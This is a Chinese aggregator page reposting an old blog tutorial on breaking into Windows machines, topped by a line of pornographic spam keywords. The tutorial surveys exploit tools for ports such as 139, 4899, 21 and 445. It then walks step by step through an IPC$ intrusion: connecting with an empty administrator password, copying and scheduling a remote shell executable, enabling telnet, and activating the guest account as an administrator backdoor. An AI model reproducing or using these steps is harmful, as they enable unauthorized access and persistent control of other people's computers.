日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

139端口***

發(fā)布時間:2024/9/20 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 139端口*** 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
135端口主要用于使用RPC(Remote Procedure Call,遠程過程調(diào)用)協(xié)議并提供DCOM(分布式組件對象模型)服務(wù),通過RPC可以保證在一臺計算機上運行的程序可以順利地執(zhí)行遠程計算機上的代碼;使用DCOM可以通過網(wǎng)絡(luò)直接進行通信,能夠跨包括HTTP協(xié)議在內(nèi)的多種網(wǎng)絡(luò)傳輸。
端口漏洞:相信去年很多Windows 2000和Windows XP用戶都中了“沖擊波”病毒,該病毒就是利用RPC漏洞來***計算機的。RPC本身在處理通過TCP/IP的消息交換部分有一個漏洞,該漏洞是由于錯誤地處理格式不正確的消息造成的。該漏洞會影響到RPC與DCOM之間的一個接口,該接口偵聽的端口就是135。
1:用139端口***
我們先確定一臺存在139端口漏洞的主機。用掃描工具掃描!比如SUPERSCAN這個端口掃描工具。假設(shè)現(xiàn)在我們已經(jīng)得到一臺存在139端口漏洞的主機,我們要使用nbtstat -a IP這個命令得到用戶的情況!現(xiàn)在我們要做的是與對方計算機進行共享資源的連接。
用到兩個NET命令,下面就是這兩個命令的使用方法
NET VIEW?
作 用:顯示域列表、計算機列表或指定計算機的共享資源列表。?
命令格式:net view [\\computername | /domain[:domainname]]?
參數(shù)介紹:?
<1>鍵入不帶參數(shù)的net view顯示當前域的計算機列表。?
<2>\\computername 指定要查看其共享資源的計算機。?
<3>/domain[:domainname]指定要查看其可用計算機的域?

NET USE?
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。?
命令格式:net use [devicename | *] [\\computername\sharename[\volume]]?
[password | *]] [/user:[domainname\]username] [[/delete] |?
[/persistent:{yes | no}]]?
參數(shù)介紹:?
鍵入不帶參數(shù)的net use列出網(wǎng)絡(luò)連接。?
devicename指定要連接到的資源名稱或要斷開的設(shè)備名稱。?
\\computername\sharename服務(wù)器及共享資源的名稱。?
password訪問共享資源的密碼。?
*提示鍵入密碼。 /user指定進行連接的另外一個用戶。?
domainname指定另一個域。?
username指定登錄的用戶名。?
/home將用戶連接到其宿主目錄?
/delete取消指定網(wǎng)絡(luò)連接。?
/persistent控制永久網(wǎng)絡(luò)連接的使用。?
C:\net use \\IP
C:\net view \\IP
我們已經(jīng)看到對方共享了他的C,D,E三個盤
我們要做的是使用NBTSTAT命令載入NBT快取.
c:\>nbtstat –R 載入NBT快取
c:\>nbtstat –c 看有無載入NBT快取
現(xiàn)在我們已經(jīng)得到的139端口漏洞的主機IP地址和用戶名,現(xiàn)在就該是我們進入他計算的時候了,點擊開始---查找--計算機,將剛才找到的主機名字輸入到上面,選擇查找,就可以找到這臺電腦了!雙擊就可以進入,其使用的方法和網(wǎng)上領(lǐng)居的一樣。
2:4899端口***
用4899過濾器.exe,掃描空口令的機器
3:80***
對sp3以前的機器,可以用webdav***;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進行注入。(啊D的注入軟件)。
4:serv-u***(21端口)
對5. 004及以下系統(tǒng),可用溢出***。(serv5004.exe)
對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼
5: 554端口
用real554.exe***。
6:6129端口
用DameWare6129.exe***。
7. 6129端口
用DameWare6129.exe***。

8. 系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進行溢出***。

9. 3127等端口
可以利用doom病毒開的端口,用nodoom.exe***。(可用mydoomscan.exe查)。

10. 其他***
利用shanlu的***軟件***(WINNTAutoAttack.exe)。
經(jīng)典IPC$***
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用"流光"掃到的用戶名是administrators,密碼為"空"的IP地址(氣好到家如果是打算***的話,就可以用這樣的命令來與127.0.0.1建立一個連

接,因為密碼為"空",所以第一個引號處就不用輸入,后面一個雙引號里的是用戶名

,輸入administrators,命令即可成功完成。

2. C:\>copy srv.exe \\127.0.0.1\admin$
先復(fù)制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的

c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復(fù)制到什么地方去了)。



3. C:\>net time \\127.0.0.1
查查時間,發(fā)現(xiàn)127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設(shè)置的時間要比主機時間快,不然你怎么啟動啊.

5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就準備

開始下面的命令。

6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意端口是99。Telnet默認的是23端口,但是我們使用的

是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打

算建立一個Telnet服務(wù)!這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。

8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這

個程序在對方計算機上運行)。當出現(xiàn)"DONE"的時候,就說明已經(jīng)啟動正常。然后使

用"net start telnet"來開啟Telnet服務(wù)!

9. Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作

一樣簡單!(然后你想做什么?想做什么就做什么吧,哈哈)

為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設(shè)定的密碼

12. C:\>net localgroup administrators guest /add
將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我

們可以用guest再次訪問這臺計算機)

轉(zhuǎn)載于:https://blog.51cto.com/mynba/24674

總結(jié)

以上是生活随笔為你收集整理的139端口***的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。